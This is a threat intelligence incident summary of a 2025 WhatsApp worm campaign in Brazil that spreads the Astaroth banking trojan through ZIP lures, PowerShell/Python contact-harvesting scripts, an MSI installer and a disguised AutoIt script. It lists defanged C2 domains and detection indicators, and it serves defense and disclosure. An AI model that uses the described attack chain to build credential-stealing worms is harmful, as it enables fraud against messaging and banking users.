Full Report
Another campaign targeting WhatsApp users in Brazil spreads like a worm and employs multiple payloads for credential theft, session hijacking, and persistence
Analysis Summary
# Incident Report: WhatsApp Worm Spreading Astaroth Banking Trojan
## Executive Summary
A persistent, multi-stage malware campaign (STAC3150) targeted WhatsApp users, primarily in Brazil, spreading via worm-like functionality through shared archive attachments. The attack chain leveraged PowerShell and Python scripts to steal WhatsApp session data and contacts, ultimately deploying the Astaroth (Guildma) banking trojan for credential theft and persistence. Over 250 customers were affected, necessitating immediate user education and the deployment of updated security signatures.
## Incident Details
- **Discovery Date:** September 24, 2025 (First observation of campaign activity)
- **Incident Date:** September 24, 2025 – Late October 2025
- **Affected Organization:** Undisclosed (Report covers detections across Sophos customers)
- **Sector:** General Users/Consumer (Infected via social engineering)
- **Geography:** Brazil (Approx. 95% of impacted devices), with secondary infections in other Latin American countries, the U.S., and Austria.
## Timeline of Events
### Initial Access
- **Date/Time:** Starting September 24, 2025
- **Vector:** Social Engineering via WhatsApp messaging, masquerading as a legitimate conversation.
- **Details:** Attackers sent victims a message using WhatsApp's "View Once" feature, luring them to open a ZIP archive attachment. This archive contained a malicious VBS or HTA file.
### Lateral Movement
- **Date/Time:** Early October 2025 onward (Progression observed)
- **Vector:** Worm-like distribution through collected contacts.
- **Details:** PowerShell or Python scripts harvested WhatsApp contact information and session data, facilitating the spam distribution of the initial malicious lure to new contacts.
### Data Exfiltration/Impact
- **Date/Time:** Ongoing during infection lifecycle
- **Impact:** Credential theft via the deployed Astaroth banking trojan, WhatsApp session hijacking, and mass collection of contact information.
- **Details:** The final payload, Astaroth, communicated with a C2 server (`manoelimoveiscaioba[.]com`) after being installed via an MSI package and executed via a malicious AutoIt script.
### Detection & Response
- **Date/Time:** Throughout the campaign (Sophos analysts actively tracking post-Sept 24)
- **Discovery Mechanism:** Sophos analysts and researchers observed and tracked the multi-stage progression.
- **Response actions taken:** SophosLabs developed and deployed countermeasures/detections (listed in Table 1) to identify the various stages of the threat, including VBS downloaders, MSI payloads, and the AutoIt execution.
## Attack Methodology
- **Initial Access:** Malicious VBS or HTA file delivered via encrypted WhatsApp ZIP archive attachment.
- **Persistence:** Astaroth installer created a startup registry key to maintain persistence post-execution.
- **Privilege Escalation:** Not explicitly detailed, but deployment of a banking trojan implies sufficient privileges to execute payloads and modify system settings (registry).
- **Defense Evasion:** Use of PowerShell to download subsequent stages, transitioning from IMAP retrieval (late Sept) to HTTP `Invoke-WebRequest` (early Oct) targeting threat intelligence feeds. Malicious AutoIt script masked as a `.log` file execution.
- **Credential Access:** Astaroth banking trojan deployment, and session hijacking/token harvesting from WhatsApp Web.
- **Discovery:** WhatsApp contact data collection using Selenium Chrome WebDriver and WPPConnect library.
- **Lateral Movement:** Self-propagation as a worm by leveraging harvested WhatsApp contact lists to send the lure to new victims.
- **Collection:** Harvesting of WhatsApp contact information and session data/tokens.
- **Exfiltration:** Credential and session data exfiltration related to banking activities (via Astaroth).
- **Impact:** Compromise of user credentials and hijacking of messaging sessions.
## Impact Assessment
- **Financial:** Potential financial losses due to banking trojan compromise (Astaroth), though specific costs are not quantified.
- **Data Breach:** Theft of WhatsApp session tokens, contacts, and credentials susceptible to banking fraud.
- **Operational:** Potential disruption to endpoints hosting the Astaroth malware. Reduced operational security due to successful social engineering.
- **Reputational:** Damage to user trust in messaging platform security if attacks persist.
## Indicators of Compromise
- **Network Indicators (Defanged):**
- C2 Domain 1: `varegjopeaks[.]com` (HTTP download server in early October)
- C2 Domain 2: `manoelimoveiscaioba[.]com` (Astaroth C2 server)
- Other Detections: `docsmoonstudioclayworks[.]online`, `shopeeship[.]com`, `miportuarios[.]com`, `borizerefeicoes[.]com`, `clhttradinglimited[.]com`, `lefthandsuperstructures[.]com`
- **File Indicators:**
- Initial files: Malicious VBS or HTA.
- Second stage: PowerShell or Python scripts exploiting WhatsApp Web APIs.
- Final payload: MSI installer (`installer.msi`) and AutoIt script masquerading as a `.log` file.
- **Behavioral Indicators:**
- Execution of PowerShell fetching content via IMAP or HTTP (`Invoke-WebRequest`).
- Use of legitimate libraries (Selenium WebDriver, WPPConnect) for browser automation/session hijacking.
- Creation of startup registry keys for Astaroth persistence.
## Response Actions
- **Containment Measures:** The primary containment action cited was updating endpoint security definitions (via Sophos Detections T1) to block known malicious files and associated network traffic.
- **Eradication Steps:** Though not explicitly detailed as a complete IR process, eradication relies on removing the MSI and AutoIt payloads and deleting the persistence registry key established by Astaroth.
- **Recovery Actions:** Recovery involves credential resets for compromised accounts and ensuring all affected endpoints have the latest security signatures deployed.
## Lessons Learned
- **Multi-stage payload delivery:** Attackers effectively chained VBS/HTA execution with subsequent retrieval of complex automation scripts (Selenium/WPPConnect) and the final banking trojan.
- **Worm-like spread:** Use of compromised systems to automatically pivot to the victim’s social graph (WhatsApp contacts) significantly increased the campaign's reach.
- **Evolving C2 infrastructure:** The campaign quickly shifted from IMAP retrieval to HTTP-based C2 communication, demonstrating adaptability by the threat actors.
## Recommendations
- **User Education:** Organizations must rigorously educate employees on the extreme dangers of opening archive attachments from *any* source on social media or instant messaging platforms, even when sent by seemingly known contacts.
- **Endpoint Detection:** Ensure EDR/Antivirus solutions are configured to actively monitor and block the execution patterns identified (e.g., unusual PowerShell usage pulling external content, execution of AutoIt masking as logs).
- **Network Monitoring:** Implement strong monitoring for outbound connections to newly registered or suspicious domains identified as C2 infrastructure, especially for protocols like HTTP POST/GET requests initiated by scripting engines.